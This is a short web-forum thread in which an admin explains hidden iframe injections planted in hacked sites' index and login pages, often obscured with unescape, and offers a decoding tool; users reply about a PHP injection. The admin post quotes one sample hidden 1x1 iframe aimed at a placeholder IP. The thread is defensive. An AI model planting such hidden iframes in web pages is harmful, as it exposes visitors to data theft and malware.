[Admin]

The Unescape function has been used quite a bit to obscure links and code injected in to websites when they have been hacked. There's been an iFrame injection hack that injects script in to peoples index.html, index.php pages normally in the footer or header. The exploit has also been known to exploit login.php pages and similar where sensitive data such as passwords are entered.

The most common is an iFrame containing a URL that eithers sends personal data to the hacker, or tries to run malware on the users PC. They are often obscured with escape/unescape and look similar to:

HTML Code:

<iframe src=http://123.123.123.123 width=1 height=1 style=display:none></iframe>

They can be to a domain name or IP, and the most common place the code is injected is right before the closing </body> tag. Often it's obscured, and will be a bunch of seemingly random characters. So to help people decode this, and work out what domain or IP is involved i have put up a tool.

Decode and Encode Unescape

If you have any questions feel free to post.

[dhw]

I currently use coppermine on several of my sites - I recently had to upgrade to the newest versions due to other user recieving a PHP injection - sounds similar to what you were refering to. Is this the same thing?

[visual]

That is a very useful tool. . . and i have been using that from very long .